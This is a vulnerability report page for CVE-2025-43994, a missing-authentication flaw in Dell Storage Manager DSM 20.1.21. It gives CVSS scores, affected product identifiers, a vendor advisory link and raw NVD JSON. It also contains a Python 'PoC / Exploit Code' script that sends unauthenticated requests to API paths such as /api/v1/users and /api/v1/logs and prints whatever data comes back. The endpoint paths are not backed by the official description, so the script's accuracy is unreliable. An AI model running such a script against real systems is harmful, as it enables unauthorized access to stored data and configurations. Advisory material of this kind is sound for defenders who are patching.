Security Vulnerability Report
CVE-2025-43994 CVSS 8.6 HIGH

Published: 2025-10-24 15:15:38
Last Modified: 2025-11-04 14:31:14

Description

Dell Storage Center - Dell Storage Manager, version(s) DSM 20.1.21, contain(s) a Missing Authentication for Critical Function vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure.

CVSS Details

CVSS Score: 8.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:storage_manager:*:*:*:*:*:*:*:* (versions before 2020) - VULNERABLE
cpe:2.3:a:dell:storage_manager:2020:r1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dell:storage_manager:2020:r1.10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dell:storage_manager:2020:r1.2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dell:storage_manager:2020:r1.20:*:*:*:*:*:* - VULNERABLE
Dell Storage Manager DSM 20.1.21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-43994 PoC - Missing Authentication in Dell Storage Manager
# Target: Dell Storage Manager DSM 20.1.21
# Vulnerability: Missing Authentication for Critical Function


def exploit_dell_storage_manager(target_url):
    """
    PoC for CVE-2025-43994
    This demonstrates the missing authentication vulnerability
    in Dell Storage Manager critical functions.
    """
    # Sensitive endpoints that should require authentication
    endpoints = [
        "/api/v1/storage-arrays",
        "/api/v1/volumes",
        "/api/v1/configurations",
        "/api/v1/users",
        "/api/v1/logs"
    ]

    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-43994: Missing Authentication\n")

    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            # Send unauthenticated request
            response = requests.get(url, timeout=10, verify=False)
            print(f"[+] Endpoint: {endpoint}")
            print(f" Status: {response.status_code}")
            if response.status_code == 200:
                print(f" Result: VULNERABLE - Data exposed")
                print(f" Data length: {len(response.text)} bytes")
                if len(response.text) > 0:
                    print(f" Sample: {response.text[:200]}...")
            else:
                print(f" Result: Not vulnerable or endpoint not found")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")
        print()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} https://dell-dsm.example.com")
        sys.exit(1)

    target = sys.argv[1]
    exploit_dell_storage_manager(target)
```

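References

https://www.dell.com/support/kbdoc/en-us/000382899/dsa-2025-393-security-update-for-storage-center-dell-storage-manager-vulnerabilities (Vendor Advisory)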

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43994", "sourceIdentifier": "[email protected]", "published": "2025-10-24T15:15:38.187", "lastModified": "2025-11-04T14:31:14.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Storage Center - Dell Storage Manager, version(s) DSM 20.1.21, contain(s) a Missing Authentication for Critical Function vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "2020", "matchCriteriaId": "F19B1117-55A1-46EC-A046-BE3B99EC4900"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:2020:r1:*:*:*:*:*:*", "matchCriteriaId": "567442CC-381B-43A1-ADE9-AE00075021D4"}, 
{"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:2020:r1.10:*:*:*:*:*:*", "matchCriteriaId": "B978EFB1-877F-4091-A401-F1861229E033"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:2020:r1.2:*:*:*:*:*:*", "matchCriteriaId": "263E78BD-D8C0-480F-9EED-D5496708CFCD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:storage_manager:2020:r1.20:*:*:*:*:*:*", "matchCriteriaId": "1055DB85-9105-44E5-9CEB-509C7F7041FE"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000382899/dsa-2025-393-security-update-for-storage-center-dell-storage-manager-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}